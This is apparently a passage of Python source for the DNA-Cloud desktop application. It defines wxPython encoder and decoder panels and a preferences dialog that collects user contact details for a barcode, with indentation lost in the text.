PATH = os.path.dirname(os.path.abspath(__file__))
#print PATH , "panels"
FILE_EXT = '.dnac'
if "win" in sys.platform and not "darwin" in sys.platform:
BARCODE_HEIGHT = 96
BARCODE_WIDTH = 470
elif "linux" in sys.platform or 'darwin' in sys.platform:
BARCODE_HEIGHT = 96
BARCODE_WIDTH = 600
FOLDER_DISCLAIMER = "It is not mandatory for you to select default folder. If you don't then every time you save .dnac file you would be asked to save a location"
PREF_DISCLAIMER = "Disclaimer : Please note that this details will be used to identify user of the DNA strings by Bio Companies hence these are mandatory to be filled."
HEADER_TEXT = "Please select your workspace where you would work in. All your files(including temporary files) will be stored in this working directory, can be changed later also from preferences."
SOFTWARE_DETAILS = "\n\n Version 1.0\n\n Visit us at www.guptalab.org/dnacloud\n\n Contact us at dnacloud@guptalab.org"
class encodePanel(wx.Panel):
def __init__(self,parent):
wx.Panel.__init__(self,parent = parent,style = wx.TAB_TRAVERSAL)
self.vBox1 = wx.BoxSizer(wx.VERTICAL)
head = wx.StaticText(self ,label = "DNA-ENCODER",style = wx.CENTER)
if 'darwin' in sys.platform:
font = wx.Font(pointSize = 19, family = wx.FONTFAMILY_ROMAN,style = wx.NORMAL, weight = wx.FONTWEIGHT_BOLD, underline = True)
head.SetFont(font)
else:
font = wx.Font(pointSize = 14, family = wx.DEFAULT,style = wx.NORMAL, weight = wx.FONTWEIGHT_BOLD, underline = True)
head.SetFont(font)
self.vBox1.Add(head ,flag = wx.ALIGN_CENTER | wx.TOP | wx.LEFT , border = 10)
#This is the adjustment of the Basic BUI text and textCtrl panels along with save to DataBase and Discard Button Options
head = wx.StaticText(self ,label = "Encode data file into DNA String",style = wx.CENTER)
if 'darwin' in sys.platform:
font = wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox1.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 10)
line1 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox1.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox1 = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Choose file",size = (150,30))
self.hBox1.Add(self.butChoose,flag = wx.EXPAND | wx.LEFT , border = 10)
path = wx.StaticText(self, label = "Select any data file (audio, video, doc etc.) from your computer")
self.hBox1.Add(path,flag = wx.ALIGN_CENTER_VERTICAL | wx.LEFT , border = 20)
self.vBox1.Add(self.hBox1)
head = wx.StaticText(self,label = "Details (approx.)")
if 'darwin' in sys.platform:
font = wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox1.Add(head,flag = wx.TOP | wx.LEFT,border =20)
line2 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox1.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " File Selected : ",style = wx.ALIGN_CENTRE)
self.txt = wx.TextCtrl(self,name = "hBox",size = (500,25),style= wx.TE_READONLY)
self.hBox.Add(path,2 ,flag = wx.EXPAND)
self.hBox.Add(self.txt, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox1.Add(self.hBox,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox2 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " Lenght Of DNA String : " , style = wx.ALIGN_CENTRE)
self.txt2 = wx.TextCtrl(self,name = "hBox3",size = (300,25),style= wx.TE_READONLY)
self.hBox2.Add(content1, 2, flag = wx.EXPAND)
self.hBox2.Add(self.txt2, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox1.Add(self.hBox2,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox3 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " Number of DNA Chunks : " , style = wx.ALIGN_CENTRE)
self.txt3 = wx.TextCtrl(self,name = "hBox3",size = (300,25),style= wx.TE_READONLY)
self.hBox3.Add(content1, 2, flag = wx.EXPAND)
self.hBox3.Add(self.txt3, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox1.Add(self.hBox3,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox4 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " Length of each DNA Chunk : ", style = wx.ALIGN_CENTRE)
self.txt4 = wx.TextCtrl(self,name = "hBox4",size = (300,25),style= wx.TE_READONLY)
self.hBox4.Add(content1, 2, flag = wx.EXPAND)
self.hBox4.Add(self.txt4, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox1.Add(self.hBox4,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox5 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " File Size (Bytes) : " , style = wx.ALIGN_CENTRE)
self.txt5 = wx.TextCtrl(self,name = "hBox5",size = (300,25),style= wx.TE_READONLY)
self.hBox5.Add(content1, 2, flag = wx.EXPAND)
self.hBox5.Add(self.txt5, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox1.Add(self.hBox5,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
#There is nothing like self.txt1
"""
head = wx.StaticText(self,label = "Encoded DNA String")
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox1.Add(head,flag = wx.TOP | wx.LEFT,border =20)
line3 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox1.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox9 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = "DNA String : ", style = wx.ALIGN_CENTRE)
self.but9 = wx.Button(self,label = "View DNA String")
content1.SetFont(font)
self.hBox9.Add(content1 ,flag = wx.LEFT ,border = 20)
self.hBox9.Add(self.but9 ,flag = wx.EXPAND | wx.LEFT , border = 180)
self.vBox1.Add(self.hBox9 ,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox10 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = "DNA String List with Error Checks : ", style = wx.ALIGN_CENTRE)
self.but10 = wx.Button(self,label = "View DNA Chunks")
font = wx.Font(9 , wx.DEFAULT, wx.NORMAL, wx.BOLD)
content1.SetFont(font)
self.hBox10.Add(content1 ,flag = wx.LEFT ,border = 20)
self.hBox10.Add(self.but10 ,flag = wx.EXPAND)
self.vBox1.Add(self.hBox10 ,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
"""
self.hBox11 = wx.BoxSizer(wx.HORIZONTAL)
self.saveBut = wx.Button(self,label = "Encode your File",size = (160,30))
self.discardBut = wx.Button(self,label = "Reset file Selected",size = (160,30))
self.hBox11.Add(self.saveBut, flag = wx.EXPAND | wx.LEFT , border = 20)
self.hBox11.Add(self.discardBut, flag = wx.EXPAND | wx.LEFT ,border = 20)
self.vBox1.Add(self.hBox11 ,flag = wx.TOP | wx.BOTTOM ,border = 10)
"""
self.clearDB = wx.Button(self,label = "Clear Database")
self.hBox11.Add(self.clearDB ,flag = wx.EXPAND)
head = wx.StaticText(self,label = "© QR Code generated for given User Details")
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox1.Add(head,flag = wx.TOP | wx.LEFT,border =20)
line3 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox1.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
img = wx.EmptyImage(240,240)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.BitmapFromImage(img))
self.vBox1.Add(self.imageCtrl,flag = wx.EXPAND | wx.LEFT | wx.BOTTOM , border = 25)
"""
self.dummyhBox = wx.BoxSizer(wx.VERTICAL)
self.vBox1.Add(self.dummyhBox, 2, wx.EXPAND)
line3 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox1.Add(line3, flag = wx.EXPAND)
self.hBox12 = wx.BoxSizer(wx.HORIZONTAL)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.Image(name = PATH + '/../icons/DNAicon.png').ConvertToBitmap())
self.hBox12.Add(self.imageCtrl,flag = wx.EXPAND | wx.LEFT | wx.TOP | wx.BOTTOM , border = 25)
self.v1Box= wx.BoxSizer(wx.VERTICAL)
head = wx.StaticText(self,label = "DNA-CLOUD")
font = wx.Font(11, wx.DEFAULT, wx.NORMAL, wx.BOLD,underline = True)
head.SetFont(font)
self.v1Box.Add(head,flag = wx.ALIGN_CENTER_VERTICAL | wx.TOP | wx.LEFT,border = 25)
head = wx.StaticText(self,label = SOFTWARE_DETAILS)
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.v1Box.Add(head,flag = wx.LEFT | wx.EXPAND , border = 20)
self.hBox12.Add(self.v1Box)
self.vBox1.Add(self.hBox12,flag = wx.ALIGN_BOTTOM)
self.SetSizer(self.vBox1)
class decodePanel(wx.Panel):
def __init__(self,parent):
wx.Panel.__init__(self,parent = parent,style = wx.TAB_TRAVERSAL)
self.vBox2 = wx.BoxSizer(wx.VERTICAL)
self.vBox2 = wx.BoxSizer(wx.VERTICAL)
head = wx.StaticText(self ,label = "DNA-DECODER",style = wx.CENTER)
if 'darwin' in sys.platform:
font = wx.Font(pointSize = 19, family = wx.FONTFAMILY_ROMAN,style = wx.NORMAL, weight = wx.FONTWEIGHT_BOLD, underline = True)
head.SetFont(font)
else:
font = wx.Font(pointSize = 14, family = wx.FONTFAMILY_ROMAN,style = wx.NORMAL, weight = wx.FONTWEIGHT_BOLD, underline = True)
head.SetFont(font)
self.vBox2.Add(head ,flag = wx.ALIGN_CENTER | wx.LEFT | wx.TOP , border = 10)
head = wx.StaticText(self ,label = "Generate data file from already encoded DNA files",style = wx.CENTER)
if 'darwin' in sys.platform:
font = wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox2.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT, border = 10)
line2 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox2.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
"""
self.cb = wx.ComboBox(self,size=(800,30) ,style=wx.CB_READONLY)
self.vBox2.Add(self.cb,flag = wx.TOP | wx.LEFT | wx.RIGHT , border = 10)
"""
self.hBox23 = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " File Selected : ",style = wx.ALIGN_CENTRE)
self.txt = wx.TextCtrl(self,name = "hBox",style= wx.TE_READONLY)
self.hBox23.Add(path, 2, flag = wx.EXPAND)
self.hBox23.Add(self.txt, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox2.Add(self.hBox23,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox24 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " Length of DNA String (approx.) : " , style = wx.ALIGN_CENTRE)
self.txt2 = wx.TextCtrl(self,name = "hBox3",style= wx.TE_READONLY)
self.hBox24.Add(content1, 2, flag = wx.EXPAND)
self.hBox24.Add(self.txt2, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox2.Add(self.hBox24,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox25 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " Number of DNA Chunks (approx.) : " , style = wx.ALIGN_CENTRE)
self.txt3 = wx.TextCtrl(self,name = "hBox3",style= wx.TE_READONLY)
self.hBox25.Add(content1, 2, flag = wx.EXPAND)
self.hBox25.Add(self.txt3, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox2.Add(self.hBox25,flag = wx.EXPAND | wx.TOP , border = 10)
self.hBox26 = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Select .dnac File ",size = (160,30))
self.hBox26.Add(self.butChoose,flag = wx.EXPAND | wx.LEFT , border = 20)
self.decodeBut1 = wx.Button(self,label = "Decode selected File ",size = (160,30))
self.hBox26.Add(self.decodeBut1,flag = wx.EXPAND | wx.LEFT , border = 20)
self.vBox2.Add(self.hBox26,flag = wx.TOP | wx.BOTTOM, border = 15)
head = wx.StaticText(self ,label = "Try DNA String just for fun",style = wx.CENTER)
if 'darwin' in sys.platform:
font = wx.Font(12, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox2.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 10)
line1 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox2.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox21 = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " Please Write DNA String :", style = wx.ALIGN_CENTRE)
self.txt21 = wx.TextCtrl(self,name = "hBox")
self.hBox21.Add(path, 2,flag = wx.EXPAND)
self.hBox21.Add(self.txt21, 8,flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox2.Add(self.hBox21 , flag = wx.EXPAND)
self.hBox22 = wx.BoxSizer(wx.HORIZONTAL)
self.decodeBut = wx.Button(self,label = "Decode",size = (150,30))
self.resetBut = wx.Button(self,label = "Reset",size = (150,30))
self.hBox22.Add(self.decodeBut ,flag = wx.LEFT ,border = 20)
self.hBox22.Add(self.resetBut ,flag = wx.EXPAND | wx.LEFT , border = 20)
self.vBox2.Add(self.hBox22 ,flag = wx.EXPAND | wx.TOP | wx.ALIGN_CENTER, border = 15)
"""
head = wx.StaticText(self,label = "© QR Code generated for given User Details")
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox2.Add(head,flag = wx.TOP | wx.LEFT,border =20)
line3 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox2.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
img = wx.EmptyImage(240,240)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.BitmapFromImage(img))
self.vBox2.Add(self.imageCtrl,flag = wx.EXPAND | wx.LEFT | wx.BOTTOM ,border = 25)
"""
self.dummyhBox = wx.BoxSizer(wx.VERTICAL)
self.vBox2.Add(self.dummyhBox, 2, wx.EXPAND)
line3 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox2.Add(line3, flag = wx.EXPAND)
self.hBox27 = wx.BoxSizer(wx.HORIZONTAL)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.Image(name = PATH + '/../icons/DNAicon.png').ConvertToBitmap())
self.hBox27.Add(self.imageCtrl,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.LEFT | wx.TOP | wx.BOTTOM, border = 25)
self.v1Box= wx.BoxSizer(wx.VERTICAL)
head = wx.StaticText(self,label = "DNA-CLOUD")
font = wx.Font(11, wx.DEFAULT, wx.NORMAL, wx.BOLD, underline = True)
head.SetFont(font)
self.v1Box.Add(head,flag = wx.ALIGN_CENTER_VERTICAL | wx.LEFT | wx.TOP,border = 25)
head = wx.StaticText(self,label = SOFTWARE_DETAILS)
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.v1Box.Add(head,flag = wx.ALIGN_CENTER_VERTICAL | wx.LEFT , border = 20)
self.hBox27.Add(self.v1Box)
self.vBox2.Add(self.hBox27)
self.SetSizer(self.vBox2)
class Preferences(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
self.WORKSPACE_PATH = cur.execute('SELECT * FROM prefs WHERE id = 8').fetchone()[1]
#print self.WORKSPACE_PATH
if "linux" in sys.platform:
self.WORKSPACE_PATH = unicodedata.normalize('NFKD', self.WORKSPACE_PATH).encode('ascii','ignore')
if not os.path.isdir(self.WORKSPACE_PATH + '/barcode'):
os.mkdir(self.WORKSPACE_PATH + '/barcode')
if con:
con.close()
if "win" in sys.platform and not 'darwin' in sys.platform:
"""
head = wx.StaticText(self ,label = "Select Your Default Folder",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 10)
line4 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line4, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxf = wx.BoxSizer(wx.HORIZONTAL)
self.txtf = wx.TextCtrl(self,name = "hBox")
self.hBoxf.Add(self.txtf,proportion = 9 ,flag = wx.EXPAND |wx.RIGHT | wx.LEFT, border = 10)
self.browBut = wx.Button(self,label=" Browse ")
self.hBoxf.Add(self.browBut,proportion = 2,flag = wx.EXPAND | wx.LEFT | wx.RIGHT, border = 7)
self.vBox.Add(self.hBoxf , flag = wx.TOP | wx.BOTTOM , border = 7)
head = wx.StaticText(self ,label = FOLDER_DISCLAIMER,style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
head.Wrap(450)
self.vBox.Add(head ,flag = wx.EXPAND | wx.LEFT | wx.RIGHT , border = 10)
"""
head = wx.StaticText(self ,label = "Enter your details",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxa = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " Full Name : \t\t\t\t\t\t\t ", style = wx.ALIGN_CENTRE)
self.hBoxa.Add(path, 3, wx.EXPAND)
self.txta = wx.TextCtrl(self,name = "hBox")
self.hBoxa.Add(self.txta, 8, flag = wx.EXPAND | wx.RIGHT , border = 5)
self.vBox.Add(self.hBoxa,flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxc = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Mobile Number : \t\t\t\t\t", style = wx.ALIGN_CENTRE)
self.hBoxc.Add(path, 3,flag = wx.EXPAND)
self.txtc = wx.TextCtrl(self,name = "hBox")
self.hBoxc.Add(self.txtc, 8,flag = wx.EXPAND | wx.RIGHT , border = 10)
self.vBox.Add(self.hBoxc , flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxd = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Email Address : \t\t\t\t\t ", style = wx.ALIGN_CENTRE)
self.hBoxd.Add(path, 3,flag = wx.EXPAND)
self.txtd = wx.TextCtrl(self,name = "hBox")
self.hBoxd.Add(self.txtd, 8,flag = wx.EXPAND | wx.RIGHT , border = 5)
self.vBox.Add(self.hBoxd, flag = wx.TOP | wx.BOTTOM, border = 7)
self.hBoxb = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = "File Name (Eg a.mkv.dnac): ", style = wx.ALIGN_CENTRE)
self.hBoxb.Add(path,proportion = 2,flag = wx.EXPAND | wx.LEFT,border = 7)
self.txtb = wx.TextCtrl(self,name = "hBox")
self.hBoxb.Add(self.txtb,proportion = 5 ,flag = wx.EXPAND |wx.RIGHT, border = 10)
self.vBox.Add(self.hBoxb , flag = wx.TOP | wx.BOTTOM , border = 7)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
try:
img = Image.open(self.WORKSPACE_PATH + '/barcode/barcode.png')
img.thumbnail((BARCODE_WIDTH,BARCODE_HEIGHT),Image.BICUBIC)
img.save(self.WORKSPACE_PATH + '/.temp/barcode', "PNG")
except IOError:
#"""Permission Error"""
#wx.MessageDialog(self,'Permission Denied. Please start the software in administrator mode.', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
#sys.exit(0)
shutil.copyfile(PATH + '/../icons/barcode.png',self.WORKSPACE_PATH + '/barcode/barcode.png')
img = Image.open(self.WORKSPACE_PATH + '/barcode/barcode.png')
img.thumbnail((BARCODE_WIDTH,BARCODE_HEIGHT),Image.BICUBIC)
if not os.path.isdir(self.WORKSPACE_PATH + '/.temp'):
os.mkdir(self.WORKSPACE_PATH +'/.temp')
img.save(self.WORKSPACE_PATH + '/.temp/barcode', "PNG")
img = wx.Image(self.WORKSPACE_PATH + '/.temp/barcode', wx.BITMAP_TYPE_ANY)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.BitmapFromImage(img))
self.vBox.Add(self.imageCtrl,flag = wx.LEFT | wx.RIGHT |wx.BOTTOM , border = 10)
head = wx.StaticText(self ,label = PREF_DISCLAIMER,style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
head.Wrap(450)
self.vBox.Add(head ,flag = wx.EXPAND | wx.LEFT | wx.RIGHT , border = 10)
line3 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBoxe = wx.BoxSizer(wx.HORIZONTAL)
self.saveBut = wx.Button(self,label=" Save ")
self.barcodeBut = wx.Button(self,label=" Generate Barcode ")
self.cancelBut = wx.Button(self,label=" Close ")
self.hBoxe.Add(self.saveBut, flag = wx.RIGHT , border = 10)
self.hBoxe.Add(self.barcodeBut, flag = wx.RIGHT | wx.wx.LEFT , border = 10)
self.hBoxe.Add(self.cancelBut, flag = wx.RIGHT , border = 10)
self.vBox.Add(self.hBoxe, flag = wx.TOP | wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTRE_VERTICAL |wx.BOTTOM, border = 10)
self.SetSizerAndFit(self.vBox)
elif "linux" in sys.platform or 'darwin' in sys.platform:
"""
head = wx.StaticText(self ,label = "Select Your Default Folder",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 10)
line4 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line4, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxf = wx.BoxSizer(wx.HORIZONTAL)
self.txtf = wx.TextCtrl(self,name = "hBox")
self.hBoxf.Add(self.txtf,proportion = 9 ,flag = wx.EXPAND |wx.RIGHT | wx.LEFT, border = 10)
self.browBut = wx.Button(self,label=" Browse ")
self.hBoxf.Add(self.browBut,proportion = 2,flag = wx.EXPAND | wx.LEFT | wx.RIGHT, border = 7)
self.vBox.Add(self.hBoxf , flag = wx.TOP | wx.BOTTOM , border = 7)
head = wx.StaticText(self ,label = FOLDER_DISCLAIMER,style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
head.Wrap(450)
self.vBox.Add(head ,flag = wx.EXPAND | wx.LEFT | wx.RIGHT , border = 10)
"""
head = wx.StaticText(self ,label = "Enter your details",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxa = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " Full Name :", style = wx.ALIGN_CENTRE)
self.hBoxa.Add(path,proportion = 1,flag = wx.EXPAND|wx.LEFT ,border = 5)
self.txta = wx.TextCtrl(self,name = "hBox")
self.hBoxa.Add(self.txta,proportion = 4,flag = wx.EXPAND | wx.LEFT , border = 110)
self.vBox.Add(self.hBoxa,flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxc = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Contact Number :", style = wx.ALIGN_CENTRE)
self.hBoxc.Add(path,proportion = 1,flag = wx.EXPAND | wx.LEFT,border = 7)
self.txtc = wx.TextCtrl(self,name = "hBox")
self.hBoxc.Add(self.txtc,proportion = 2 ,flag = wx.EXPAND | wx.LEFT , border = 60)
self.vBox.Add(self.hBoxc , flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxd = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Email Address :", style = wx.ALIGN_CENTRE)
self.hBoxd.Add(path,proportion= 1,flag = wx.EXPAND|wx.LEFT , border = 7)
self.txtd = wx.TextCtrl(self,name = "hBox")
self.hBoxd.Add(self.txtd,proportion = 3,flag = wx.EXPAND | wx.LEFT , border = 75)
self.vBox.Add(self.hBoxd, flag = wx.TOP | wx.BOTTOM, border = 7)
self.hBoxb = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = "File Name (Eg. a.png.dnac):", style = wx.ALIGN_CENTRE)
self.hBoxb.Add(path,proportion = 1.5,flag = wx.EXPAND | wx.LEFT,border = 7)
self.txtb = wx.TextCtrl(self,name = "hBox")
self.hBoxb.Add(self.txtb,proportion = 2,flag = wx.EXPAND)
self.vBox.Add(self.hBoxb , flag = wx.TOP | wx.BOTTOM , border = 7)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
try:
img = Image.open(self.WORKSPACE_PATH + '/barcode/barcode.png')
img.thumbnail((BARCODE_WIDTH,BARCODE_HEIGHT),Image.BICUBIC)
img.save(self.WORKSPACE_PATH + '/.temp/barcode', "PNG")
except IOError:
#"""Permission Error"""
#wx.MessageDialog(self,'Permission Denied. Please start the software in administrator mode.', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
#sys.exit(0)
shutil.copyfile(PATH + '/../icons/barcode.png',self.WORKSPACE_PATH + '/barcode/barcode.png')
img = Image.open(self.WORKSPACE_PATH + '/barcode/barcode.png')
img.thumbnail((BARCODE_WIDTH,BARCODE_HEIGHT),Image.BICUBIC)
if not os.path.isdir(self.WORKSPACE_PATH + '/.temp'):
os.mkdir(self.WORKSPACE_PATH +'/.temp')
img.save(self.WORKSPACE_PATH + '/.temp/barcode', "PNG")
img = wx.Image(self.WORKSPACE_PATH + '/.temp/barcode', wx.BITMAP_TYPE_ANY)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.BitmapFromImage(img))
self.vBox.Add(self.imageCtrl,flag = wx.LEFT | wx.ALIGN_CENTER_HORIZONTAL , border = 10)
head = wx.StaticText(self ,label = PREF_DISCLAIMER,style = wx.ALIGN_CENTER_HORIZONTAL)
if 'darwin' in sys.platform:
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
head.Wrap(570)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 8)
else:
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
head.Wrap(550)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line3 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBoxe = wx.BoxSizer(wx.HORIZONTAL)
self.saveBut = wx.Button(self,label="Save")
self.barcodeBut = wx.Button(self,label="Generate Barcode")
self.cancelBut = wx.Button(self,label="Close")
self.hBoxe.Add(self.saveBut, flag = wx.RIGHT , border = 10)
self.hBoxe.Add(self.barcodeBut, flag = wx.RIGHT | wx.wx.LEFT , border = 10)
self.hBoxe.Add(self.cancelBut, flag = wx.RIGHT , border = 10)
self.vBox.Add(self.hBoxe, flag = wx.TOP | wx.ALIGN_CENTER_HORIZONTAL | wx.BOTTOM, border = 10)
self.SetSizerAndFit(self.vBox)
self.Layout()
self.saveBut.Bind(wx.EVT_BUTTON,self.save)
self.barcodeBut.Bind(wx.EVT_BUTTON,self.generate)
self.cancelBut.Bind(wx.EVT_BUTTON,self.cancel)
